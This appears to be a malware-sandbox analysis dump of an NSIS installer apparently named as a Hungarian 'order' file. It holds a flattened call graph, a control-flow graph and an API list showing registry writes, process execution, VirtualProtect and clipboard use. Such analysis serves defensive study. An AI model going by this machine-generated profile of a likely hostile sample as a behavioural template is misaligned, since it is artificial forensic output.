6fc62453 5623->5624 5625 6fc6245e GlobalAlloc 5624->5625 5626 6fc6247d 5624->5626 5625->5624 5627 401a72 5628 402d84 17 API calls 5627->5628 5629 401a7b 5628->5629 5630 402d84 17 API calls 5629->5630 5631 401a20 5630->5631 5632 6fc61774 5633 6fc617a3 5632->5633 5634 6fc61bff 22 API calls 5633->5634 5635 6fc617aa 5634->5635 5636 6fc617b1 5635->5636 5637 6fc617bd 5635->5637 5638 6fc61312 2 API calls 5636->5638 5639 6fc617c7 5637->5639 5640 6fc617e4 5637->5640 5646 6fc617bb 5638->5646 5643 6fc615dd 3 API calls 5639->5643 5641 6fc6180e 5640->5641 5642 6fc617ea 5640->5642 5645 6fc615dd 3 API calls 5641->5645 5644 6fc61654 3 API calls 5642->5644 5647 6fc617cc 5643->5647 5648 6fc617ef 5644->5648 5645->5646 5649 6fc61654 3 API calls 5647->5649 5650 6fc61312 2 API calls 5648->5650 5651 6fc617d2 5649->5651 5652 6fc617f5 GlobalFree 5650->5652 5653 6fc61312 2 API calls 5651->5653 5652->5646 5654 6fc61809 GlobalFree 5652->5654 5655 6fc617d8 GlobalFree 5653->5655 5654->5646 5655->5646 5656 401573 5657 401583 ShowWindow 5656->5657 5658 40158c 5656->5658 5657->5658 5659 40159a ShowWindow 5658->5659 5660 402c2a 5658->5660 5659->5660 5661 4023f4 5662 402da6 17 API calls 5661->5662 5663 402403 5662->5663 5664 402da6 17 API calls 5663->5664 5665 40240c 5664->5665 5666 402da6 17 API calls 5665->5666 5667 402416 GetPrivateProfileStringW 5666->5667 5668 4014f5 SetForegroundWindow 5669 402c2a 5668->5669 5670 401ff6 5671 402da6 17 API calls 5670->5671 5672 401ffd 5671->5672 5673 40699e 2 API calls 5672->5673 5674 402003 5673->5674 5676 402014 5674->5676 5677 4065af wsprintfW 5674->5677 5677->5676 5678 401b77 5679 402da6 17 API calls 5678->5679 5680 401b7e 5679->5680 5681 402d84 17 API calls 5680->5681 5682 401b87 wsprintfW 5681->5682 5683 402c2a 5682->5683 5331 6fc62a7f 5332 6fc62acf 5331->5332 5333 6fc62a8f VirtualProtect 5331->5333 5333->5332 5684 4046fa lstrcpynW lstrlenW 5685 40167b 5686 402da6 17 API calls 5685->5686 5687 401682 5686->5687 5688 402da6 17 API calls 5687->5688 5689 40168b 5688->5689 5690 402da6 17 API calls 5689->5690 5691 401694 MoveFileW 5690->5691 5692 4016a7 5691->5692 5698 4016a0 5691->5698 5694 40699e 2 API calls 5692->5694 5696 4022f6 5692->5696 5693 401423 24 API calls 5693->5696 5695 4016b6 5694->5695 5695->5696 5697 406428 36 API calls 5695->5697 5697->5698 5698->5693 5706 4022ff 5707 402da6 17 API calls 5706->5707 5708 402305 5707->5708 5709 402da6 17 API calls 5708->5709 5710 40230e 5709->5710 5711 402da6 17 API calls 5710->5711 5712 402317 5711->5712 5713 40699e 2 API calls 5712->5713 5714 402320 5713->5714 5715 402331 lstrlenW lstrlenW 5714->5715 5719 402324 5714->5719 5717 4056ca 24 API calls 5715->5717 5716 4056ca 24 API calls 5720 40232c 5716->5720 5718 40236f SHFileOperationW 5717->5718 5718->5719 5718->5720 5719->5716 5719->5720 5721 6fc61979 5722 6fc6199c 5721->5722 5723 6fc619d1 GlobalFree 5722->5723 5724 6fc619e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5722->5724 5723->5724 5725 6fc61312 2 API calls 5724->5725 5726 6fc61b6e GlobalFree GlobalFree 5725->5726 5727 4019ff 5728 402da6 17 API calls 5727->5728 5729 401a06 5728->5729 5730 402da6 17 API calls 5729->5730 5731 401a0f 5730->5731 5732 401a16 lstrcmpiW 5731->5732 5733 401a28 lstrcmpW 5731->5733 5734 401a1c 5732->5734 5733->5734 5735 401000 5736 401037 BeginPaint GetClientRect 5735->5736 5737 40100c DefWindowProcW 5735->5737 5739 4010f3 5736->5739 5740 401179 5737->5740 5741 401073 CreateBrushIndirect FillRect DeleteObject 5739->5741 5742 4010fc 5739->5742 5741->5739 5743 401102 CreateFontIndirectW 5742->5743 5744 401167 EndPaint 5742->5744 5743->5744 5745 401112 6 API calls 5743->5745 5744->5740 5745->5744 5746 401d81 5747 401d94 GetDlgItem 5746->5747 5748 401d87 5746->5748 5750 401d8e 5747->5750 5749 402d84 17 API calls 5748->5749 5749->5750 5751 401dd5 GetClientRect LoadImageW SendMessageW 5750->5751 5752 402da6 17 API calls 5750->5752 5754 401e33 5751->5754 5756 401e3f 5751->5756 5752->5751 5755 401e38 DeleteObject 5754->5755 5754->5756 5755->5756 5757 401503 5758 40150b 5757->5758 5760 40151e 5757->5760 5759 402d84 17 API calls 5758->5759 5759->5760 5761 404783 5762 4048b5 5761->5762 5764 40479b 5761->5764 5763 40491f 5762->5763 5765 4049e9 5762->5765 5770 4048f0 GetDlgItem SendMessageW 5762->5770 5763->5765 5766 404929 GetDlgItem 5763->5766 5767 4045c4 18 API calls 5764->5767 5772 40462b 8 API calls 5765->5772 5768 404943 5766->5768 5769 4049aa 5766->5769 5771 404802 5767->5771 5768->5769 5774 404969 SendMessageW LoadCursorW SetCursor 5768->5774 5769->5765 5775 4049bc 5769->5775 5794 4045e6 EnableWindow 5770->5794 5777 4045c4 18 API calls 5771->5777 5773 4049e4 5772->5773 5798 404a32 5774->5798 5779 4049d2 5775->5779 5780 4049c2 SendMessageW 5775->5780 5782 40480f CheckDlgButton 5777->5782 5779->5773 5784 4049d8 SendMessageW 5779->5784 5780->5779 5781 40491a 5795 404a0e 5781->5795 5792 4045e6 EnableWindow 5782->5792 5784->5773 5787 40482d GetDlgItem 5793 4045f9 SendMessageW 5787->5793 5789 404843 SendMessageW 5790 404860 GetSysColor 5789->5790 5791 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5789->5791 5790->5791 5791->5773 5792->5787 5793->5789 5794->5781 5796 404a21 SendMessageW 5795->5796 5797 404a1c 5795->5797 5796->5763 5797->5796 5801 405c8e ShellExecuteExW 5798->5801 5800 404998 LoadCursorW SetCursor 5800->5769 5801->5800 5802 402383 5803 40238a 5802->5803 5806 40239d 5802->5806 5804 4066a5 17 API calls 5803->5804 5805 402397 5804->5805 5805->5806 5807 405cc8 MessageBoxIndirectW 5805->5807 5807->5806 5808 402c05 SendMessageW 5809 402c2a 5808->5809 5810 402c1f InvalidateRect 5808->5810 5810->5809 5811 6fc61000 5814 6fc6101b 5811->5814 5815 6fc615b6 GlobalFree 5814->5815 5816 6fc61020 5815->5816 5817 6fc61027 GlobalAlloc 5816->5817 5818 6fc61024 5816->5818 5817->5818 5819 6fc615dd 3 API calls 5818->5819 5820 6fc61019 5819->5820 5821 405809 5822 4059b3 5821->5822 5823 40582a GetDlgItem GetDlgItem GetDlgItem 5821->5823 5824 4059e4 5822->5824 5825 4059bc GetDlgItem CreateThread CloseHandle 5822->5825 5866 4045f9 SendMessageW 5823->5866 5827 405a0f 5824->5827 5829 405a34 5824->5829 5830 4059fb ShowWindow ShowWindow 5824->5830 5825->5824 5831 405a6f 5827->5831 5834 405a23 5827->5834 5835 405a49 ShowWindow 5827->5835 5828 40589a 5832 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5828->5832 5836 40462b 8 API calls 5829->5836 5868 4045f9 SendMessageW 5830->5868 5831->5829 5839 405a7d SendMessageW 5831->5839 5837 4058f3 SendMessageW SendMessageW 5832->5837 5838 40590f 5832->5838 5840 40459d SendMessageW 5834->5840 5842 405a69 5835->5842 5843 405a5b 5835->5843 5841 405a42 5836->5841 5837->5838 5845 405922 5838->5845 5846 405914 SendMessageW 5838->5846 5839->5841 5847 405a96 CreatePopupMenu 5839->5847 5840->5829 5844 40459d SendMessageW 5842->5844 5848 4056ca 24 API calls 5843->5848 5844->5831 5850 4045c4 18 API calls 5845->5850 5846->5845 5849 4066a5 17 API calls 5847->5849 5848->5842 5851 405aa6 AppendMenuW 5849->5851 5852 405932 5850->5852 5853 405ac3 GetWindowRect 5851->5853 5854 405ad6 TrackPopupMenu 5851->5854 5855 40593b ShowWindow 5852->5855 5856 40596f GetDlgItem SendMessageW 5852->5856 5853->5854 5854->5841 5857 405af1 5854->5857 5858 405951 ShowWindow 5855->5858 5861 40595e 5855->5861 5856->5841 5859 405996 SendMessageW SendMessageW 5856->5859 5860 405b0d SendMessageW 5857->5860 5858->5861 5859->5841 5860->5860 5862 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5860->5862 5867 4045f9 SendMessageW 5861->5867 5864 405b4f SendMessageW 5862->5864 5864->5864 5865 405b78 GlobalUnlock SetClipboardData CloseClipboard 5864->5865 5865->5841 5866->5828 5867->5856 5868->5827 4905 40248a 4906 402da6 17 API calls 4905->4906 4907 40249c 4906->4907 4908 402da6 17 API calls 4907->4908 4909 4024a6 4908->4909 4922 402e36 4909->4922 4912 402c2a 4913 4024de 4915 4024ea 4913->4915 4926 402d84 4913->4926 4914 402da6 17 API calls 4916 4024d4 lstrlenW 4914->4916 4918 402509 RegSetValueExW 4915->4918 4919 403371 44 API calls 4915->4919 4916->4913 4920 40251f RegCloseKey 4918->4920 4919->4918 4920->4912 4923 402e51 4922->4923 4929 406503 4923->4929 4927 4066a5 17 API calls 4926->4927 4928 402d99 4927->4928 4928->4915 4930 406512 4929->4930 4931 40651d RegCreateKeyExW 4930->4931 4932 4024b6 4930->4932 4931->4932 4932->4912 4932->4913 4932->4914 4949 40290b 4950 402da6 17 API calls 4949->4950 4951 402912 FindFirstFileW 4950->4951 4952 40293a 4951->4952 4956 402925 4951->4956 4953 402943 4952->4953 4957 4065af wsprintfW 4952->4957 4958 406668 lstrcpynW 4953->4958 4957->4953 4958->4956 5869 404e0b 5870 404e37 5869->5870 5871 404e1b 5869->5871 5873 404e6a 5870->5873 5874 404e3d SHGetPathFromIDListW 5870->5874 5880 405cac GetDlgItemTextW 5871->5880 5876 404e54 SendMessageW 5874->5876 5877 404e4d 5874->5877 5875 404e28 SendMessageW 5875->5870 5876->5873 5879 40140b 2 API calls 5877->5879 5879->5876 5880->5875 5881 6fc6170d 5882 6fc615b6 GlobalFree 5881->5882 5885 6fc61725 5882->5885 5883 6fc6176b GlobalFree 5884 6fc61740 5884->5883 5885->5883 5885->5884 5886 6fc61757 VirtualFree 5885->5886 5886->5883 5887 40190c 5888 401943 5887->5888 5889 402da6 17 API calls 5888->5889 5890 401948 5889->5890 5891 405d74 67 API calls 5890->5891 5892 401951 5891->5892 5893 40190f 5894 402da6 17 API calls 5893->5894 5895 401916 5894->5895 5896 405cc8 MessageBoxIndirectW 5895->5896 5897 40191f 5896->5897 5898 401491 5899 4056ca 24 API calls 5898->5899 5900 401498 5899->5900 5901 402891 5902 402898 5901->5902 5903 402ba9 5901->5903 5904 402d84 17 API calls 5902->5904 5905 40289f 5904->5905 5906 4028ae SetFilePointer 5905->5906 5906->5903 5907 4028be 5906->5907 5909 4065af wsprintfW 5907->5909 5909->5903 5910 401f12 5911 402da6 17 API calls 5910->5911 5912 401f18 5911->5912 5913 402da6 17 API calls 5912->5913 5914 401f21 5913->5914 5915 402da6 17 API calls 5914->5915 5916 401f2a 5915->5916 5917 402da6 17 API calls 5916->5917 5918 401f33 5917->5918 5919 401423 24 API calls 5918->5919 5920 401f3a 5919->5920 5927 405c8e ShellExecuteExW 5920->5927 5922 401f82 5924 40292e 5922->5924 5928 406ae0 WaitForSingleObject 5922->5928 5925 401f9f CloseHandle 5925->5924 5927->5922 5929 406afa 5928->5929 5930 406b0c GetExitCodeProcess 5929->5930 5931 406a71 2 API calls 5929->5931 5930->5925 5932 406b01 WaitForSingleObject 5931->5932 5932->5929 5933 402f93 5934 402fa5 SetTimer 5933->5934 5935 402fbe 5933->5935 5934->5935 5936 40300c 5935->5936 5937 403012 MulDiv 5935->5937 5938 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 5937->5938 5938->5936 5954 401d17 5955 402d84 17 API calls 5954->5955 5956 401d1d IsWindow 5955->5956 5957 401a20 5956->5957 5958 401b9b 5959 401ba8 5958->5959 5960 401bec 5958->5960 5961 401c31 5959->5961 5968 401bbf 5959->5968 5962 401bf1 5960->5962 5963 401c16 GlobalAlloc 5960->5963 5964 4066a5 17 API calls 5961->5964 5971 40239d 5961->5971 5962->5971 5979 406668 lstrcpynW 5962->5979 5965 4066a5 17 API calls 5963->5965 5967 402397 5964->5967 5965->5961 5967->5971 5972 405cc8 MessageBoxIndirectW 5967->5972 5977 406668 lstrcpynW 5968->5977 5969 401c03 GlobalFree 5969->5971 5972->5971 5973 401bce 5978 406668 lstrcpynW 5973->5978 5975 401bdd 5980 406668 lstrcpynW 5975->5980 5977->5973 5978->5975 5979->5969 5980->5971 5981 40261c 5982 402da6 17 API calls 5981->5982 5983 402623 5982->5983 5986 406158 GetFileAttributesW CreateFileW 5983->5986 5985 40262f 5986->5985 5362 40259e 5363 402de6 17 API calls 5362->5363 5364 4025a8 5363->5364 5365 402d84 17 API calls 5364->5365 5366 4025b1 5365->5366 5367 4025d9 RegEnumValueW 5366->5367 5368 4025cd RegEnumKeyW 5366->5368 5371 40292e 5366->5371 5369 4025f5 RegCloseKey 5367->5369 5370 4025ee 5367->5370 5368->5369 5369->5371 5370->5369 5994 40149e 5995 4014ac PostQuitMessage 5994->5995 5996 40239d 5994->5996 5995->5996 4787 4015a3 4788 402da6 17 API calls 4787->4788 4789 4015aa SetFileAttributesW 4788->4789 4790 4015bc 4789->4790 5997 401fa4 5998 402da6 17 API calls 5997->5998 5999 401faa 5998->5999 6000 4056ca 24 API calls 5999->6000 6001 401fb4 6000->6001 6002 405c4b 2 API calls 6001->6002 6003 401fba 6002->6003 6004 401fdd CloseHandle 6003->6004 6005 406ae0 5 API calls 6003->6005 6007 40292e 6003->6007 6004->6007 6008 401fcf 6005->6008 6008->6004 6010 4065af wsprintfW 6008->6010 6010->6004 4888 40252a 4899 402de6 4888->4899 4891 402da6 17 API calls 4892 40253d 4891->4892 4893 402548 RegQueryValueExW 4892->4893 4896 40292e 4892->4896 4894 402568 4893->4894 4895 40256e RegCloseKey 4893->4895 4894->4895 4904 4065af wsprintfW 4894->4904 4895->4896 4900 402da6 17 API calls 4899->4900 4901 402dfd 4900->4901 4902 4064d5 RegOpenKeyExW 4901->4902 4903 402534 4902->4903 4903->4891 4904->4895 4933 4021aa 4934 402da6 17 API calls 4933->4934 4935 4021b1 4934->4935 4936 402da6 17 API calls 4935->4936 4937 4021bb 4936->4937 4938 402da6 17 API calls 4937->4938 4939 4021c5 4938->4939 4940 402da6 17 API calls 4939->4940 4941 4021cf 4940->4941 4942 402da6 17 API calls 4941->4942 4943 4021d9 4942->4943 4944 402218 CoCreateInstance 4943->4944 4945 402da6 17 API calls 4943->4945 4948 402237 4944->4948 4945->4944 4946 401423 24 API calls 4947 4022f6 4946->4947 4948->4946 4948->4947 6011 40202a 6012 402da6 17 API calls 6011->6012 6013 402031 6012->6013 6014 406a35 5 API calls 6013->6014 6015 402040 6014->6015 6016 40205c GlobalAlloc 6015->6016 6018 4020cc 6015->6018 6017 402070 6016->6017 6016->6018 6019 406a35 5 API calls 6017->6019 6020 402077 6019->6020 6021 406a35 5 API calls 6020->6021 6022 402081 6021->6022 6022->6018 6026 4065af wsprintfW 6022->6026 6024 4020ba 6027 4065af wsprintfW 6024->6027 6026->6024 6027->6018 6035 401a30 6036 402da6 17 API calls 6035->6036 6037 401a39 ExpandEnvironmentStringsW 6036->6037 6038 401a4d 6037->6038 6040 401a60 6037->6040 6039 401a52 lstrcmpW 6038->6039 6038->6040 6039->6040 5000 405031 GetDlgItem GetDlgItem 5001 405083 7 API calls 5000->5001 5008 4052a8 5000->5008 5002 40512a DeleteObject 5001->5002 5003 40511d SendMessageW 5001->5003 5004 405133 5002->5004 5003->5002 5006 405142 5004->5006 5007 40516a 5004->5007 5005 40538a 5012 405436 5005->5012 5018 405629 5005->5018 5023 4053e3 SendMessageW 5005->5023 5010 4066a5 17 API calls 5006->5010 5011 4045c4 18 API calls 5007->5011 5008->5005 5009 40536b 5008->5009 5015 405306 5008->5015 5009->5005 5019 40537c SendMessageW 5009->5019 5016 40514c SendMessageW SendMessageW 5010->5016 5017 40517e 5011->5017 5013 405440 SendMessageW 5012->5013 5014 405448 5012->5014 5013->5014 5025 405461 5014->5025 5026 40545a ImageList_Destroy 5014->5026 5034 405471 5014->5034 5059 404f7f SendMessageW 5015->5059 5016->5004 5022 4045c4 18 API calls 5017->5022 5020 40462b 8 API calls 5018->5020 5019->5005 5024 405637 5020->5024 5038 40518f 5022->5038 5023->5018 5028 4053f8 SendMessageW 5023->5028 5029 40546a GlobalFree 5025->5029 5025->5034 5026->5025 5027 4055eb 5027->5018 5032 4055fd ShowWindow GetDlgItem ShowWindow 5027->5032 5031 40540b 5028->5031 5029->5034 5030 40526a GetWindowLongW SetWindowLongW 5033 405283 5030->5033 5040 40541c SendMessageW 5031->5040 5032->5018 5035 4052a0 5033->5035 5036 405288 ShowWindow 5033->5036 5034->5027 5051 4054ac 5034->5051 5064 404fff 5034->5064 5058 4045f9 SendMessageW 5035->5058 5057 4045f9 SendMessageW 5036->5057 5037 405317 5037->5009 5038->5030 5039 4051e2 SendMessageW 5038->5039 5041 405265 5038->5041 5044 405220 SendMessageW 5038->5044 5045 405234 SendMessageW 5038->5045 5039->5038 5040->5012 5041->5030 5041->5033 5044->5038 5045->5038 5047 40529b 5047->5018 5048 4055b6 5049 4055c1 InvalidateRect 5048->5049 5054 4055cd 5048->5054 5049->5054 5050 4054da SendMessageW 5052 4054f0 5050->5052 5051->5050 5051->5052 5052->5048 5053 405551 5052->5053 5056 405564 SendMessageW SendMessageW 5052->5056 5053->5056 5054->5027 5073 404f3a 5054->5073 5056->5052 5057->5047 5058->5008 5060 404fa2 GetMessagePos ScreenToClient SendMessageW 5059->5060 5061 404fde SendMessageW 5059->5061 5062 404fd6 5060->5062 5063 404fdb 5060->5063 5061->5062 5062->5037 5063->5061 5076 406668 lstrcpynW 5064->5076 5066 405012 5077 4065af wsprintfW 5066->5077 5068 40501c 5069 40140b 2 API calls 5068->5069 5070 405025 5069->5070 5078 406668 lstrcpynW 5070->5078 5072 40502c 5072->5051 5079 404e71 5073->5079 5075 404f4f 5075->5027 5076->5066 5077->5068 5078->5072 5080 404e8a 5079->5080 5081 4066a5 17 API calls 5080->5081 5082 404eee 5081->5082 5083 4066a5 17 API calls 5082->5083 5084 404ef9 5083->5084 5085 4066a5 17 API calls 5084->5085 5086 404f0f lstrlenW wsprintfW SetDlgItemTextW 5085->5086 5086->5075 5087 4023b2 5088 4023c0 5087->5088 5089 4023ba 5087->5089 5091 402da6 17 API calls 5088->5091 5092 4023ce 5088->5092 5090 402da6 17 API calls 5089->5090 5090->5088 5091->5092 5093 402da6 17 API calls 5092->5093 5095 4023dc 5092->5095 5093->5095 5094 402da6 17 API calls 5096 4023e5 WritePrivateProfileStringW 5094->5096 5095->5094 5097 402434 5098 402467 5097->5098 5099 40243c 5097->5099 5101 402da6 17 API calls 5098->5101 5100 402de6 17 API calls 5099->5100 5102 402443 5100->5102 5103 40246e 5101->5103 5104 40244d 5102->5104 5108 40247b 5102->5108 5109 402e64 5103->5109 5106 402da6 17 API calls 5104->5106 5107 402454 RegDeleteValueW RegCloseKey 5106->5107 5107->5108 5110 402e71 5109->5110 5111 402e78 5109->5111 5110->5108 5111->5110 5113 402ea9 5111->5113 5114 4064d5 RegOpenKeyExW 5113->5114 5115 402ed7 5114->5115 5116 402ee1 5115->5116 5117 402f8c 5115->5117 5118 402ee7 RegEnumValueW 5116->5118 5122 402f0a 5116->5122 5117->5110 5119 402f71 RegCloseKey 5118->5119 5118->5122 5119->5117 5120 402f46 RegEnumKeyW 5121 402f4f RegCloseKey 5120->5121 5120->5122 5123 406a35 5 API calls 5121->5123 5122->5119 5122->5120 5122->5121 5124 402ea9 6 API calls 5122->5124 5125 402f5f 5123->5125 5124->5122 5126 402f81 5125->5126 5127 402f63 RegDeleteKeyW 5125->5127 5126->5117 5127->5117 6046 404734 lstrlenW 6047 404753 6046->6047 6048 404755 WideCharToMultiByte 6046->6048 6047->6048 5128 401735 5129 402da6 17 API calls 5128->5129 5130 40173c SearchPathW 5129->5130 5131 401757 5130->5131 6049 404ab5 6050 404ae1 6049->6050 6051 404af2 6049->6051 6110 405cac GetDlgItemTextW 6050->6110 6052 404afe GetDlgItem 6051->6052 6059 404b5d 6051->6059 6055 404b12 6052->6055 6054 404aec 6057 4068ef 5 API calls 6054->6057 6058 404b26 SetWindowTextW 6055->6058 6062 405fe2 4 API calls 6055->6062 6056 404c41 6108 404df0 6056->6108 6112 405cac GetDlgItemTextW 6056->6112 6057->6051 6063 4045c4 18 API calls 6058->6063 6059->6056 6064 4066a5 17 API calls 6059->6064 6059->6108 6061 40462b 8 API calls 6066 404e04 6061->6066 6067 404b1c 6062->6067 6068 404b42 6063->6068 6069 404bd1 SHBrowseForFolderW 6064->6069 6065 404c71 6070 40603f 18 API calls 6065->6070 6067->6058 6074 405f37 3 API calls 6067->6074 6071 4045c4 18 API calls 6068->6071 6069->6056 6072 404be9 CoTaskMemFree 6069->6072 6073 404c77 6070->6073 6075 404b50 6071->6075 6076 405f37 3 API calls 6072->6076 6113 406668 lstrcpynW 6073->6113 6074->6058 6111 4045f9 SendMessageW 6075->6111 6078 404bf6 6076->6078 6081 404c2d SetDlgItemTextW 6078->6081 6085 4066a5 17 API calls 6078->6085 6080 404b56 6083 406a35 5 API calls 6080->6083 6081->6056 6082 404c8e 6084 406a35 5 API calls 6082->6084 6083->6059 6096 404c95 6084->6096 6086 404c15 lstrcmpiW 6085->6086 6086->6081 6088 404c26 lstrcatW 6086->6088 6087 404cd6 6114 406668 lstrcpynW 6087->6114 6088->6081 6090 404cdd 6091 405fe2 4 API calls 6090->6091 6092 404ce3 GetDiskFreeSpaceW 6091->6092 6094 404d07 MulDiv 6092->6094 6097 404d2e 6092->6097 6094->6097 6095 405f83 2 API calls 6095->6096 6096->6087 6096->6095 6096->6097 6098 404d9f 6097->6098 6099 404f3a 20 API calls 6097->6099 6100 404dc2 6098->6100 6102 40140b 2 API calls 6098->6102 6101 404d8c 6099->6101 6115 4045e6 EnableWindow 6100->6115 6103 404da1 SetDlgItemTextW 6101->6103 6104 404d91 6101->6104 6102->6100 6103->6098 6106 404e71 20 API calls 6104->6106 6106->6098 6107 404dde 6107->6108 6109 404a0e SendMessageW 6107->6109 6108->6061 6109->6108 6110->6054 6111->6080 6112->6065 6113->6082 6114->6090 6115->6107 6116 401d38 6117 402d84 17 API calls 6116->6117 6118 401d3f 6117->6118 6119 402d84 17 API calls 6118->6119 6120 401d4b GetDlgItem 6119->6120 6121 402638 6120->6121 6122 4014b8 6123 4014be 6122->6123 6124 401389 2 API calls 6123->6124 6125 4014c6 6124->6125 6126 6fc6103d 6127 6fc6101b 5 API calls 6126->6127 6128 6fc61056 6127->6128 5340 40563e 5341 405662 5340->5341 5342 40564e 5340->5342 5344 40566a IsWindowVisible 5341->5344 5351 40568a 5341->5351 5343 405654 5342->5343 5353 4056ab 5342->5353 5347 404610 SendMessageW 5343->5347 5345 405677 5344->5345 5344->5353 5348 404f7f 5 API calls 5345->5348 5346 4056b0 CallWindowProcW 5349 40565e 5346->5349 5347->5349 5350 405681 5348->5350 5350->5351 5351->5346 5352 404fff 4 API calls 5351->5352 5352->5353 5353->5346 6129 40263e 6130 402652 6129->6130 6131 40266d 6129->6131 6134 402d84 17 API calls 6130->6134 6132 402672 6131->6132 6133 40269d 6131->6133 6135 402da6 17 API calls 6132->6135 6136 402da6 17 API calls 6133->6136 6137 402659 6134->6137 6138 402679 6135->6138 6139 4026a4 lstrlenW 6136->6139 6142 4026d1 6137->6142 6144 4026e7 6137->6144 6145 406239 5 API calls 6137->6145 6146 40668a WideCharToMultiByte 6138->6146 6139->6137 6141 40268d lstrlenA 6141->6137 6143 40620a WriteFile 6142->6143 6142->6144 6143->6144 6145->6142 6146->6141

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a call 403c25 OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 79 403b91-403b97 65->79 80 403b7c-403b8b call 405cc8 ExitProcess 65->80 66->53 67->53 67->66 84 403a0c-403a19 69->84 85 4039bc-4039f1 69->85 78 403a54-403a57 70->78 78->65 82 403b99-403bae GetCurrentProcess OpenProcessToken 79->82 83 403c0f-403c17 79->83 89 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 82->89 90 403bdf-403bed call 406a35 82->90 92 403c19 83->92 93 403c1c-403c1f ExitProcess 83->93 86 403a1b-403a29 call 40603f 84->86 87 403a5c-403a70 call 405c33 lstrcatW 84->87 91 4039f3-4039f7 85->91 86->65 103 403a2f-403a45 call 406668 * 2 86->103 106 403a72-403a78 lstrcatW 87->106 107 403a7d-403a97 lstrcatW lstrcmpiW 87->107 89->90 104 403bfb-403c06 ExitWindowsEx 90->104 105 403bef-403bf9 90->105 97 403a00-403a08 91->97 98 4039f9-4039fe 91->98 92->93 97->91 102 403a0a 97->102 98->97 98->102 102->84 103->70 104->83 111 403c08-403c0a call 40140b 104->111 105->104 105->111 106->107 108 403b6a 107->108 109 403a9d-403aa0 107->109 108->65 112 403aa2-403aa7 call 405b99 109->112 113 403aa9 call 405c16 109->113 111->83 121 403aae-403abe SetCurrentDirectoryW 112->121 113->121 123 403ac0-403ac6 call 406668 121->123 124 403acb-403af7 call 406668 121->124 123->124 128 403afc-403b17 call 4066a5 DeleteFileW 124->128 131 403b57-403b61 128->131 132 403b19-403b29 CopyFileW 128->132 131->128 134 403b63-403b65 call 406428 131->134 132->131 133 403b2b-403b4b call 406428 call 4066a5 call 405c4b 132->133 133->131 142 403b4d-403b54 CloseHandle 133->142 134->108 142->131
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe",00000020,"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe",00000000), ref: 004037E9
                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe",00000000,?), ref: 00403A69
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe",00000000,?), ref: 00403A78
